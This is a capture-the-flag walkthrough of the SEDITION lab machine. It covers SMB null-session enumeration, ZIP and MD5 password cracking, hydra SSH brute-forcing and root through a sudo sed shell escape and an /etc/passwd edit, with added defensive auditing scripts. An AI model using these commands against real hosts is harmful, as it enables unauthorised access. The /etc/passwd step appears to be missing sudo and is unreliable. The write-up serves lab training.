SEDITION MACHINE
The first step was network reconnaissance to identify the target machine. arp-scan was used to find active hosts on the local network, confirming the presence of a host at 192.168.88.3.
┌──(root㉿kali)-[/home/luis]
└─# arp-scan -I eth0 --localnet
Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.1 d8:44:89:50:2d:a3 (Unknown)
192.168.88.2 00:e0:4c:97:01:a7 (Unknown)
192.168.88.3 08:00:27:69:09:9a (Unknown)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.947 seconds (131.48 hosts/sec). 3 responded
Once the host was identified, Nmap was used to discover which services were running on the machine. The scan revealed that ports 139 (NetBIOS session service), 445 (SMB) and 65535 (unknown at this stage) were open.
┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p- --min-rate 5000 -sC 192.168.88.3 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-18 18:18 CEST
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:18
Completed NSE at 18:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:18
Completed NSE at 18:18, 0.00s elapsed
Initiating ARP Ping Scan at 18:18
Scanning 192.168.88.3 [1 port]
Completed ARP Ping Scan at 18:18, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:18
Scanning 192.168.88.3 [65535 ports]
Discovered open port 139/tcp on 192.168.88.3
Discovered open port 445/tcp on 192.168.88.3
Discovered open port 65535/tcp on 192.168.88.3
Completed SYN Stealth Scan at 18:18, 2.42s elapsed (65535 total ports)
NSE: Script scanning 192.168.88.3.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:18
Completed NSE at 18:19, 28.09s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:19
Completed NSE at 18:19, 0.00s elapsed
Nmap scan report for 192.168.88.3
Host is up, received arp-response (0.00019s latency).
Scanned at 2025-09-18 18:18:40 CEST for 31s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON
139/tcp open netbios-ssn syn-ack ttl 64
445/tcp open microsoft-ds syn-ack ttl 64
65535/tcp open unknown syn-ack ttl 64
MAC Address: 08:00:27:69:09:9A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Host script results:
| smb2-time:
| date: 2025-09-18T16:18:48
|_ start_date: N/A
| nbstat: NetBIOS name: SEDITION, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SEDITION<00> Flags: <unique><active>
| SEDITION<03> Flags: <unique><active>
| SEDITION<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 4s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 34753/tcp): CLEAN (Couldn't connect)
| Check 2 (port 28763/tcp): CLEAN (Couldn't connect)
| Check 3 (port 43320/udp): CLEAN (Failed to receive data)
| Check 4 (port 41220/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:19
Completed NSE at 18:19, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:19
Completed NSE at 18:19, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 31.12 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Next, we add the host name SEDITION to /etc/hosts so that it resolves to 192.168.88.3, as shown below.
┌──(root㉿kali)-[/home/luis]
└─# nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.88.3 SEDITION
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Since SMB (port 445) is open, we try listing it with the command below. Its output identifies the server as a Unix host running Samba and shows that SMB signing is not required.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.3 -u '' -p ''
SMB 192.168.88.3 445 SEDITION [*] Unix - Samba (name:SEDITION) (domain:SEDITION) (signing:False) (SMBv1:False)
SMB 192.168.88.3 445 SEDITION [+] SEDITION\:
Next, smbmap is used with a null session to see what can be obtained. As shown below, several shares are listed, and the backup share is readable without credentials.
- smbmap -H 192.168.88.3 -u '' -p ''
└─# smbmap -H 192.168.88.3 -u '' -p ''
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\] Checking for open ports... [*] Detected 1 hosts serving SMB
[|] Authenticating... [*] Established 1 SMB connections(s) and 0 authenticated session(s)
[-] Enumerating shares...
[+] IP: 192.168.88.3:445 Name: SEDITION Status: NULL Session
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
backup READ ONLY
IPC$ NO ACCESS IPC Service (Samba Server)
nobody NO ACCESS Home Directories
[-] Closing connections..
[*] Closed 1 connections
- smbclient -NL //192.168.88.3
└─# smbclient -NL //192.168.88.3
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
backup Disk
IPC$ IPC IPC Service (Samba Server)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.88.3 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
We connect to the backup share with the following command:
- smbclient -N //192.168.88.3/backup -U Anonymous
Once connected, we can list the share contents. It holds a single file, secretito.zip, as shown below.
└─# smbclient -N //192.168.88.3/backup -U Anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 6 19:02:53 2025
.. D 0 Sun Jul 6 20:15:13 2025
secretito.zip N 216 Sun Jul 6 19:02:31 2025
We download the file to the attacking machine with get and then confirm that it is present locally, as shown below.
smb: \> get secretito.zip
getting file \secretito.zip of size 216 as secretito.zip (35,2 KiloBytes/sec) (average 35,2 KiloBytes/sec)
┌──(root㉿kali)-[/home/luis]
└─# ls
CVE-2025-32463_chwoot galeria.txt password_bloodhound reverse.php text.php
Descargas Imágenes passwords.txt reverse_shell.php users1.txt
docker-compose.yml jamm.txt persistence.txt secretito.zip Vídeos
Documentos LinkedInDumper Plantillas sedition.txt vulnyx_shop.txt
Escritorio Música prueba.elf SMS-Bomber Win7Blue
friendly.txt nc.exe Público spoofy
The same share listing can be obtained with netexec, which also confirms that the null session is mapped to the Guest account, as shown below.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.3 -u 'null' -p 'null' --shares
SMB 192.168.88.3 445 SEDITION [*] Unix - Samba (name:SEDITION) (domain:SEDITION) (signing:False) (SMBv1:False)
SMB 192.168.88.3 445 SEDITION [+] SEDITION\null:null (Guest)
SMB 192.168.88.3 445 SEDITION [*] Enumerated shares
SMB 192.168.88.3 445 SEDITION Share Permissions Remark
SMB 192.168.88.3 445 SEDITION ----- ----------- ------
SMB 192.168.88.3 445 SEDITION print$ Printer Drivers
SMB 192.168.88.3 445 SEDITION backup READ
SMB 192.168.88.3 445 SEDITION IPC$ IPC Service (Samba Server)
SMB 192.168.88.3 445 SEDITION nobody Home Directories
The archive is password protected, so zip2john is used to extract a crackable hash from it, as shown below.
┌──(root㉿kali)-[/home/luis]
└─# zip2john secretito.zip > secretito.txt
ver 1.0 efh 5455 efh 7875 secretito.zip/password PKZIP Encr: 2b chk, TS_chk, cmplen=34, decmplen=22, crc=F2E5967A ts=969D cs=969d type=0
John the Ripper with the rockyou wordlist recovers the archive password, which is sebastian, as shown below.
┌──(root㉿kali)-[/home/luis]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt secretito.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sebastian (secretito.zip/password)
1g 0:00:00:00 DONE (2025-09-18 18:44) 50.00g/s 409600p/s 409600c/s 409600C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
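The zip2john line above reports the archive as "PKZIP Encr", which is the legacy ZipCrypto scheme, and that is what makes a plain wordlist attack on the archive practical. As an added defensive check (example code, not from the original post), the parser below reads a ZIP central directory and classifies each entry's protection as none, zipcrypto or aes, so backups can be audited for archives that rely on ZipCrypto; the sample archives it inspects are constructed in-code.

```python
import io
import struct
import zipfile
import zlib

# ZIP record signatures and the WinZip AES extra-field identifier.
CENTRAL_DIR_SIG = 0x02014B50
EOCD_SIG = 0x06054B50
AES_EXTRA_ID = 0x9901
AES_METHOD = 99  # compression method reserved for WinZip AES entries

# Constructed WinZip AES extra field: id, size, vendor version, "AE", AES-256, real method (deflate).
AES_EXTRA = struct.pack("<HHH2sBH", AES_EXTRA_ID, 7, 2, b"AE", 3, 8)


def _has_aes_extra(extra: bytes) -> bool:
    """Walk the extra field's (id, size, data) records looking for the AES one."""
    off = 0
    while off + 4 <= len(extra):
        field_id, size = struct.unpack_from("<HH", extra, off)
        if field_id == AES_EXTRA_ID:
            return True
        off += 4 + size
    return False


def zip_entry_encryption(data: bytes) -> list[tuple[str, str]]:
    """Return (name, scheme) per entry, where scheme is none, zipcrypto or aes.

    The central directory is used because it always carries the real flags and
    sizes; local headers may defer sizes to a trailing data descriptor."""
    eocd = data.rfind(b"PK\x05\x06")
    if eocd < 0:
        raise ValueError("no end-of-central-directory record found")
    _, _, _, _, n_entries, _, cd_offset, _ = struct.unpack_from("<IHHHHIIH", data, eocd)
    entries = []
    off = cd_offset
    for _ in range(n_entries):
        f = struct.unpack_from("<IHHHHHHIIIHHHHHII", data, off)
        if f[0] != CENTRAL_DIR_SIG:
            raise ValueError("corrupt central directory")
        flags, method, name_len, extra_len, comment_len = f[3], f[4], f[10], f[11], f[12]
        name = data[off + 46:off + 46 + name_len].decode("utf-8", "replace")
        extra = data[off + 46 + name_len:off + 46 + name_len + extra_len]
        if not flags & 0x0001:          # general-purpose bit 0: entry is encrypted
            scheme = "none"
        elif method == AES_METHOD or _has_aes_extra(extra):
            scheme = "aes"
        else:
            scheme = "zipcrypto"        # legacy PKWARE stream cipher, zip2john's "PKZIP" format
        entries.append((name, scheme))
        off += 46 + name_len + extra_len + comment_len
    return entries


def weak_entries(data: bytes) -> list[str]:
    """Names of entries whose only protection is ZipCrypto."""
    return [name for name, scheme in zip_entry_encryption(data) if scheme == "zipcrypto"]


def build_zip(name: bytes, payload: bytes, flags: int, method: int = 0, extra: bytes = b"") -> bytes:
    """Constructed single-entry archive for testing; only the headers matter here."""
    crc = zlib.crc32(payload)
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, 0, 0,
                        crc, len(payload), len(payload), len(name), len(extra))
    local += name + extra + payload
    central = struct.pack("<IHHHHHHIIIHHHHHII", CENTRAL_DIR_SIG, 20, 20, flags, method,
                          0, 0, crc, len(payload), len(payload), len(name), len(extra),
                          0, 0, 0, 0, 0)
    central += name + extra
    eocd = struct.pack("<IHHHHIIH", EOCD_SIG, 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


def real_unencrypted_zip() -> bytes:
    """A genuine archive written by the standard library, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("note.txt", "constructed sample, not the machine's file")
    return buf.getvalue()


if __name__ == "__main__":
    for sample in (real_unencrypted_zip(),
                   build_zip(b"password", b"secret", 0x0001),
                   build_zip(b"password", b"secret", 0x0001, AES_METHOD, AES_EXTRA)):
        print(zip_entry_encryption(sample), "weak:", weak_entries(sample))
```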
Now we unzip the archive with that password and read the extracted file, which contains another password: elbunkermolagollon123.
┌──(root㉿kali)-[/home/luis]
└─# unzip secretito.zip
Archive: secretito.zip
[secretito.zip] password password:
extracting: password
┌──(root㉿kali)-[/home/luis]
└─# cat password
elbunkermolagollon123
Port 65535 was reported as unknown, so a version scan (-sV) is run against it to identify the service, as shown below.
┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p 65535 --min-rate 5000 -sC 192.168.88.3 -vvv -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-18 18:50 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Initiating ARP Ping Scan at 18:50
Scanning 192.168.88.3 [1 port]
Completed ARP Ping Scan at 18:50, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:50
Scanning 192.168.88.3 [1 port]
Discovered open port 65535/tcp on 192.168.88.3
Completed SYN Stealth Scan at 18:50, 0.02s elapsed (1 total ports)
Initiating Service scan at 18:50
Scanning 1 service on 192.168.88.3
Completed Service scan at 18:50, 0.02s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.88.3.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.24s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Nmap scan report for 192.168.88.3
Host is up, received arp-response (0.00050s latency).
Scanned at 2025-09-18 18:50:12 CEST for 0s
PORT STATE SERVICE REASON VERSION
65535/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
| 256 32:ca:e5:d1:12:c2:1e:11:1e:58:43:32:a0:dc:03:ab (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG/Kzfk09iAKKpRuJrSfx4A4WiSlvP++mk2g5NcP7Bfva4A0l0SZxeDNKXB6iJN1++qyQWE2OUVzLrZ8Gdjkn+M=
| 256 79:3a:80:50:61:d9:96:34:e2:db:d6:1e:65:f0:a9:14 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILvZ909p40dk+Vi+xYHAfVXI4wI0XGPS/fgHXpFI2mRP
MAC Address: 08:00:27:69:09:9A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.76 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
With SSH identified on port 65535, and a password but no username, hydra is used with a username wordlist to find which account the password belongs to, as shown below.
┌──(root㉿kali)-[/home/luis]
└─# hydra -L /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -p elbunkermolagollon123 ssh://192.168.88.3:65535
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-18 18:54:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 8295455 login tries (l:8295455/p:1), ~518466 tries per task
[DATA] attacking ssh://192.168.88.3:65535/
[65535][ssh] host: 192.168.88.3 login: cowboy password: elbunkermolagollon123
Gotcha! The credentials are:
- Username: cowboy
- Password: elbunkermolagollon123
Now we log in over SSH with the following command.
┌──(root㉿kali)-[/home/luis]
└─# ssh cowboy@192.168.88.3 -p 65535
The authenticity of host '[192.168.88.3]:65535 ([192.168.88.3]:65535)' can't be established.
ED25519 key fingerprint is SHA256:d64eWXWzi0z5UIXU5lGoJN3ggXzK28/LPtdAVK3mHkw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.88.3]:65535' (ED25519) to the list of known hosts.
cowboy@192.168.88.3's password:
Permission denied, please try again.
cowboy@192.168.88.3's password:
Linux Sedition 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jul 6 20:00:56 2025 from 192.168.0.17
cowboy@Sedition:~$ sudo -l
[sudo] contraseña para cowboy:
Sorry, user cowboy may not run sudo on sedition.
Now we try to escalate privileges. cowboy has no sudo rights, so we list the listening sockets with ss and discover an internal port, 3306 (MariaDB), bound to localhost only, as shown below.
cowboy@Sedition:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 192.168.88.255:137 0.0.0.0:*
udp UNCONN 0 0 192.168.88.3:137 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:137 0.0.0.0:*
udp UNCONN 0 0 192.168.88.255:138 0.0.0.0:*
udp UNCONN 0 0 192.168.88.3:138 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:138 0.0.0.0:*
tcp LISTEN 0 50 0.0.0.0:445 0.0.0.0:*
tcp LISTEN 0 50 0.0.0.0:139 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:65535 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 50 [::]:445 [::]:*
tcp LISTEN 0 50 [::]:139 [::]:*
tcp LISTEN 0 128 [::]:65535 [::]:*
The shell history of cowboy also reveals useful commands, including a MariaDB login with the same password, as shown below.
cowboy@Sedition:~$ history
1 history
2 exit
3 mariadb
4 mariadb -u cowboy -pelbunkermolagollon123
5 su debian
6 clear
7 sudo -l
8 clear
9 sudo -l
10 clear
We run the command from the history to connect to the database, as shown below.
cowboy@Sedition:~$ mariadb -u cowboy -pelbunkermolagollon123
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 37
Server version: 10.11.11-MariaDB-0+deb12u1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
Inside the MariaDB monitor we run the following queries to enumerate the databases, tables and stored credentials:
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| bunker |
| information_schema |
+--------------------+
2 rows in set (0,001 sec)
MariaDB [(none)]> use bunker
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [bunker]> show tables;
+------------------+
| Tables_in_bunker |
+------------------+
| users |
+------------------+
1 row in set (0,000 sec)
MariaDB [bunker]> select * from users;
+--------+----------------------------------+
| user | password |
+--------+----------------------------------+
| debian | 7c6a180b36896a0a8c02787eeafb0e4c |
+--------+----------------------------------+
1 row in set (0,001 sec)
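An added example, not from the original post, showing why the stored value was trivially recoverable and what the table should have held instead: the MD5 hash from the users table above is resolved with a small constructed candidate list (standing in for a wordlist such as rockyou.txt), beside a salted, iterated PBKDF2 scheme with constant-time verification.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Hash exactly as it appears in the bunker.users table on this page.
PAGE_HASH = "7c6a180b36896a0a8c02787eeafb0e4c"

# Constructed candidate list standing in for a real wordlist.
CANDIDATES = ["123456", "password", "qwerty", "password1", "letmein"]


def md5_dictionary_lookup(stored_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Why unsalted MD5 fails: each candidate costs one fast hash, and the
    result compares directly against the stored value. With no salt, the
    same table of precomputed hashes works against every user and every site."""
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == stored_hex.lower():
            return word
    return None


def hash_password(password: str, iterations: int = 600_000, salt: bytes = b"") -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256, stored as algo$iterations$salt$digest.
    A fresh random salt per user means equal passwords give different records."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported scheme {algo!r}")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    print("page hash resolves to:", md5_dictionary_lookup(PAGE_HASH, CANDIDATES))
    record = hash_password("password1")
    print("hardened record:", record)
    print("verify ok:", verify_password("password1", record))
```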
The stored value is a plain MD5 hash of password1, so we can switch to the debian user with su, as shown below (password: password1).
cowboy@Sedition:~$ su debian
Contraseña:
debian@Sedition:/home/cowboy$ ls
ls: no se puede abrir el directorio '.': Permiso denegado
debian@Sedition:/home/cowboy$ cd ..
debian@Sedition:/home$ ls
cowboy debian
debian@Sedition:/home$ cd cowboy/
bash: cd: cowboy/: Permiso denegado
As debian, we check the sudo rights again to look for a privilege escalation path, as shown below.
debian@Sedition:/home$ sudo -l
Matching Defaults entries for debian on sedition:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User debian may run the following commands on sedition:
(ALL) NOPASSWD: /usr/bin/sed
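An added example, not part of the original post: a small auditor that parses `sudo -l` output (the sample below is constructed from the output above) and flags NOPASSWD rules for binaries that GTFOBins documents as able to spawn a shell, such as sed. The SHELL_CAPABLE set is an illustrative subset, not the full GTFOBins list.

```python
import os
import re

# Illustrative subset of binaries GTFOBins documents as giving a shell or
# arbitrary command execution when permitted through sudo; not exhaustive.
SHELL_CAPABLE = {"sed", "awk", "find", "vim", "vi", "nano", "less", "more",
                 "python3", "perl", "env", "bash", "sh"}

# One permission line from `sudo -l`: "(runas) TAG: cmd, cmd".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample mirroring the `sudo -l` output shown on the page.
SAMPLE_SUDO_L = """\
Matching Defaults entries for debian on sedition:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin,
    use_pty

User debian may run the following commands on sedition:
    (ALL) NOPASSWD: /usr/bin/sed
"""


def audit_sudo_rules(text: str) -> list[dict]:
    """Parse `sudo -l` output and rate each allowed command.

    A shell-capable binary is a full compromise of the runas user no matter how
    narrow the rule looks, because the binary itself can execute commands."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            binary = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
            shell_capable = binary == "ALL" or binary in SHELL_CAPABLE
            findings.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd,
                "binary": binary,
                "shell_capable": shell_capable,
                "risk": "critical" if shell_capable else "review",
            })
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE_SUDO_L):
        print(finding)
```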
See the GTFOBins entry for sed, which documents how it can be abused under sudo: https://gtfobins.github.io/gtfobins/sed/
debian@Sedition:/home/cowboy$ sudo sed -n '1e exec bash 1>&0' /etc/hosts
Gotcha! We are now root.
root@Sedition:/home/cowboy# whoami
root
root@Sedition:/home/cowboy#
root@Sedition:/home# cd debian/
root@Sedition:/home/debian# ls
backup flag.txt
Gotcha! We have found flag.txt, the user flag, as shown below.
root@Sedition:/home/debian# cat flag.txt
pinguinitopinguinazo
Alternatively, we can become root by removing the password field from root's entry in /etc/passwd with sed, so that su root no longer asks for a password, as shown below.
debian@Sedition:/home/cowboy$ sed -i 's/root:x/root:/g' /etc/passwd
debian@Sedition:/home/cowboy$ su root
root@Sedition:/home/cowboy#
root@Sedition:/home/cowboy# cd /root
root@Sedition:~# ls
root.txt
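As an added detection example (not from the original post): the sed command above leaves root with an empty password field, a change that is simple to spot after the fact. This checker parses passwd-format text (the sample below is constructed) and reports empty password fields, hashes kept outside /etc/shadow and extra UID 0 accounts; run from cron or a file-integrity job it would flag this technique.

```python
# Constructed /etc/passwd excerpt: the root line has had its "x" removed,
# which is the state the sed command above produces; toor is an extra UID 0 account.
SAMPLE_PASSWD = """\
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
cowboy:x:1000:1000::/home/cowboy:/bin/bash
debian:x:1001:1001::/home/debian:/bin/bash
toor:x:0:0::/root:/bin/bash
"""

# Values that mean "look in /etc/shadow" or "account locked"; anything else is suspicious.
LOCKED_OR_SHADOWED = {"x", "*", "!", "!!"}


def audit_passwd(text: str) -> list[tuple[str, str]]:
    """Return (account, problem) pairs for entries that weaken authentication."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append((name, "empty password field (login without a password)"))
        elif pw not in LOCKED_OR_SHADOWED:
            findings.append((name, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and name != "root":
            findings.append((name, "additional UID 0 account"))
    return findings


def audit_passwd_file(path: str = "/etc/passwd") -> list[tuple[str, str]]:
    """Convenience wrapper for running the check on a live system."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for account, problem in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {problem}")
```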
Gotcha! We have found the root flag, as shown below.
root@Sedition:~# cat root.txt
laflagdelbunkerderootmolaaunmas
Thank you very much for reading this article. I hope you liked it and learned something new. This article has been written for ethical purposes. Good Hack!